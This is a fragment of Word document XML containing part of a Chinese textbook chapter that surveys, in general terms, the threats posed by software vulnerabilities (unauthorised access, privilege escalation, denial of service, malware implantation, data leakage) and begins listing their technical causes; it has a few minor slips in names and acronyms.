      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>工业控制系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B89E091"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漏洞对系统造成的威胁主要有：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1378CF94" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>非法获得访问权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC01D63" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>非法获得访问权限在</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IUT-TX.800定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>未经授权使用资源</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows的用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>主要有</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Power Users</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Guest</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不同的用户拥有不同的权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。常见的非法获得访问权限有</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>非法打印文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>非法读取文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>非法写文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>非法执行文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1134106C" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>权限提升</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1566AE38"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用户账号的权限提升指的是低权限提升到高权限，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows强制完整性控制（WMIC Windows Mandatory Integrity Control</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）包括：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F36498D"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S-1-16-0x0：不被信任(0)：指那些由匿名团队启动的进程的完整性级别。该级别</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会让大多数写入权限被阻。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B06A56"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S-1-16-0x1000：低级(1)：被用于保护模式下的IE浏览器。该级别阻挡对于系统中</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>大多数对象（比如文件和注册表项）的写入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEC1CFE"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S-1-16-0x2000：中级(2)：用于UAC启动时启动的普通应用程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F20F526"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S-1-16-0x3000：高级(3)：用于UAC启动后启动的经过提升的管理应用程序，或者UAC禁用后的普通应用程序（此时用户处于管理员模式）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E696C9C"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S-1-16-0x4000：系统级(4)：用于服务和系统级应用程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D788EE7"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某些应用程序运行在较高的权限下，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IE，Chrome, Adobe Reader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等，可借助这些应用程序作为沙箱绕过操作系统的权限检查。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550EF734" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E6413"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拒绝服务的目的是使得计算机软件或者系统（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）无法正常工作、无法提供正常的服务。包括本地拒绝服务漏洞和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>远程拒绝服务漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C2131B"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本地拒绝服务漏洞：导致运行在本地 的应用程序无法正常工作或者异常退出，甚至蓝屏</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>远程拒绝服务漏洞：发送特定的网络数据报文给应用程序，使得提供服务的程序异常或者退出</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5063C35B"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hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>某Android 应用本地拒绝服务漏洞源于程序没有对Intent.getXXXExtra()获取的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>异常或者畸形数据进行异常捕获，从而导致攻击者可通过向受害者应用发送</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>空数据、异常或畸形数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来达到使该应用crash的目的。简单的说就是攻击者通过intent发送空数据、异常或畸形数据给受害者应用，导致其崩溃。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4A5E04" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>恶意软件植入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26057EC5"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主动植入</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>利用系统正常功能或者漏洞将恶意代码植入到目标中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不需要用户的任何干预</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。如计算机病毒感染、移动存储介质感染、网络蠕虫等</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDD11B3"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被动植入</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将恶意代码植入到目标时</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>需要借助用户的操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。如物理植入、诱骗注入、邮件漏洞、浏览器漏洞、文档漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFCDA78" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据丢失或者泄露</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4155EA49"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指数据被破坏、删除或者非法读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1809D14E"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第一种：由于对文件的访问权限设置错误而导致受限文件被非法读取，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Password的读取；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAF6E8F"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第二种：由于没有充分验证用户的输入，导致数据或者文件被非法读取，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web应用的文件浏览；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243139E5"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第三种：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>系统漏洞导致服务器器信息泄露，如DNS的域传送漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F86C6C8"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.1.4 软件漏洞产生的原因</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4084B029"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软件中的大多数漏洞源于：逻辑错误、功能上的缺陷、社会工程、策略失误。可分为技术因素和非技术因素。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D66F601"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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>技术因素：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F8476D"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（1）</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>输入验证错误：包括缓冲区溢出、SQL注入、XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等等，比如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>没有在安全的上下文环境中验证输入的可信性</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验证代码分散</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不安全的组件边界</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>组件间的通信机制，如套接字、管道、文件、共享内存、RPC/IPC等</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
